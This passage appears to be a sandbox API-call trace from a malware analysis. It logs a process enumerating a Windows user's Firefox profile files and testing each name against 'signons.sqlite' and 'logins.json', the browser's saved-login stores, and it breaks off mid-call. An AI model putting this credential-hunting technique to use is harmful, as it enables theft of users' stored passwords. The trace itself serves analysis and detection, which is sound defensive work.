GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0588.317] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.317] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.318] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bc30 [0588.318] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.319] CloseHandle (hObject=0x5b4) returned 1 [0588.319] CloseHandle (hObject=0x4d8) returned 1 [0588.319] LocalFree (hMem=0x5d7dc0) returned 0x0 [0588.319] StrStrIW (lpFirst="key3.db", lpSrch="signons.sqlite") returned 0x0 [0588.319] StrStrIW (lpFirst="key3.db", lpSrch="logins.json") returned 0x0 [0588.319] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.319] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.319] lstrlenW (lpString="\\") returned 1 [0588.319] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.319] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.319] lstrlenW (lpString="localstore.rdf") returned 14 [0588.319] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.319] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5d7c90 [0588.319] LocalFree (hMem=0x578c38) returned 0x0 [0588.319] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.319] CloseHandle (hObject=0x4d8) returned 1 [0588.319] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0588.319] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5d7dd0 [0588.319] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x5d7dd0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf") returned 0x5b [0588.319] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.319] CloseHandle (hObject=0x4d8) returned 1 [0588.319] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.319] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4fe [0588.320] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.320] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.335] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bcc0 [0588.335] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.335] CloseHandle (hObject=0x5b4) returned 1 [0588.335] CloseHandle (hObject=0x4d8) returned 1 [0588.335] LocalFree (hMem=0x5d7dd0) returned 0x0 [0588.335] StrStrIW (lpFirst="localstore.rdf", lpSrch="signons.sqlite") returned 0x0 [0588.335] StrStrIW (lpFirst="localstore.rdf", lpSrch="logins.json") returned 0x0 [0588.335] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.335] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.335] lstrlenW (lpString="\\") returned 1 [0588.335] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.335] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.335] lstrlenW (lpString="marionette.log") returned 14 [0588.335] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.335] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5d7c90 [0588.335] LocalFree (hMem=0x578c38) returned 0x0 [0588.335] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.336] CloseHandle (hObject=0x4d8) returned 1 [0588.336] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0588.336] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5d7dd0 [0588.336] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x5d7dd0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log") returned 0x5b [0588.336] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.336] CloseHandle (hObject=0x4d8) returned 1 [0588.336] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.336] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39 [0588.336] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.336] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.337] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bd50 [0588.337] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.337] CloseHandle (hObject=0x5b4) returned 1 [0588.337] CloseHandle (hObject=0x4d8) returned 1 [0588.337] LocalFree (hMem=0x5d7dd0) returned 0x0 [0588.337] StrStrIW (lpFirst="marionette.log", lpSrch="signons.sqlite") returned 0x0 [0588.337] StrStrIW (lpFirst="marionette.log", lpSrch="logins.json") returned 0x0 [0588.337] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.337] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.338] lstrlenW (lpString="\\") returned 1 [0588.338] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.338] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.338] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0588.338] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.338] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5d7c90 [0588.338] LocalFree (hMem=0x578c38) returned 0x0 [0588.338] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.338] CloseHandle (hObject=0x4d8) returned 1 [0588.338] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0588.338] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5d7dd0 [0588.338] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x5d7dd0, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf") returned 0x5a [0588.338] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.338] CloseHandle (hObject=0x4d8) returned 1 [0588.338] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.338] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef3 [0588.338] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.338] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.344] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bde0 [0588.344] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.344] CloseHandle (hObject=0x5b4) returned 1 [0588.345] CloseHandle (hObject=0x4d8) returned 1 [0588.345] LocalFree (hMem=0x5d7dd0) returned 0x0 [0588.345] StrStrIW (lpFirst="mimeTypes.rdf", lpSrch="signons.sqlite") returned 0x0 [0588.345] StrStrIW (lpFirst="mimeTypes.rdf", lpSrch="logins.json") returned 0x0 [0588.345] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.345] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.345] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0588.345] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0588.345] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.345] lstrlenW (lpString="\\") returned 1 [0588.345] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.345] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.345] lstrlenW (lpString="minidumps") returned 9 [0588.345] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.345] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5d7c90 [0588.345] LocalFree (hMem=0x578c38) returned 0x0 [0588.345] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0588.345] lstrlenW (lpString="\\*.*") returned 4 [0588.345] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0588.345] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5d7dc8 [0588.345] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*.*", lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0x57ca60 [0588.345] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0588.345] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0588.345] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0588.345] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0588.345] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0 [0588.345] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0588.345] LocalFree (hMem=0x5d7dc8) returned 0x0 [0588.345] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.345] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.345] lstrlenW (lpString="\\") returned 1 [0588.346] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.346] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.346] lstrlenW (lpString="parent.lock") returned 11 [0588.346] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.346] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5d7c90 [0588.346] LocalFree (hMem=0x578c38) returned 0x0 [0588.346] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.346] CloseHandle (hObject=0x4d8) returned 1 [0588.346] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0588.346] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5d7dc8 [0588.346] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x5d7dc8, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock") returned 0x58 [0588.346] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.346] CloseHandle (hObject=0x4d8) returned 1 [0588.346] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.346] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0588.346] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0588.346] CloseHandle (hObject=0x4d8) returned 1 [0588.346] LocalFree (hMem=0x5d7dc8) returned 0x0 [0588.346] StrStrIW (lpFirst="parent.lock", lpSrch="signons.sqlite") returned 0x0 [0588.346] StrStrIW (lpFirst="parent.lock", lpSrch="logins.json") returned 0x0 [0588.346] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.346] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.346] lstrlenW (lpString="\\") returned 1 [0588.346] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.346] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.346] lstrlenW (lpString="permissions.sqlite") returned 18 [0588.346] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.346] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56afc8 [0588.346] LocalFree (hMem=0x578c38) returned 0x0 [0588.346] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.347] CloseHandle (hObject=0x4d8) returned 1 [0588.347] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0588.347] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56c300 [0588.347] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x56c300, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite") returned 0x5f [0588.347] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.347] CloseHandle (hObject=0x4d8) returned 1 [0588.347] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.347] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0588.347] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.347] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.357] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57be70 [0588.357] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.358] CloseHandle (hObject=0x5b4) returned 1 [0588.358] CloseHandle (hObject=0x4d8) returned 1 [0588.358] LocalFree (hMem=0x56c300) returned 0x0 [0588.358] StrStrIW (lpFirst="permissions.sqlite", lpSrch="signons.sqlite") returned 0x0 [0588.358] StrStrIW (lpFirst="permissions.sqlite", lpSrch="logins.json") returned 0x0 [0588.358] LocalFree (hMem=0x56afc8) returned 0x0 [0588.358] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.358] lstrlenW (lpString="\\") returned 1 [0588.358] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.358] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.358] lstrlenW (lpString="places.sqlite") returned 13 [0588.358] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.358] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5d7c90 [0588.358] LocalFree (hMem=0x578c38) returned 0x0 [0588.358] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.358] CloseHandle (hObject=0x4d8) returned 1 [0588.359] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0588.359] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5d7dd0 [0588.359] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x5d7dd0, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite") returned 0x5a [0588.359] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.359] CloseHandle (hObject=0x4d8) returned 1 [0588.359] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.359] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa00000 [0588.359] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.359] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3580000 [0588.512] LocalFree (hMem=0x5d7dd0) returned 0x0 [0588.512] StrStrIW (lpFirst="places.sqlite", lpSrch="signons.sqlite") returned 0x0 [0588.512] StrStrIW (lpFirst="places.sqlite", lpSrch="logins.json") returned 0x0 [0588.512] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.512] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.512] lstrlenW (lpString="\\") returned 1 [0588.513] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.513] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.513] lstrlenW (lpString="pluginreg.dat") returned 13 [0588.513] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.513] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5d7c90 [0588.513] LocalFree (hMem=0x578c38) returned 0x0 [0588.513] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.513] CloseHandle (hObject=0x4d8) returned 1 [0588.513] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0588.513] LocalAlloc 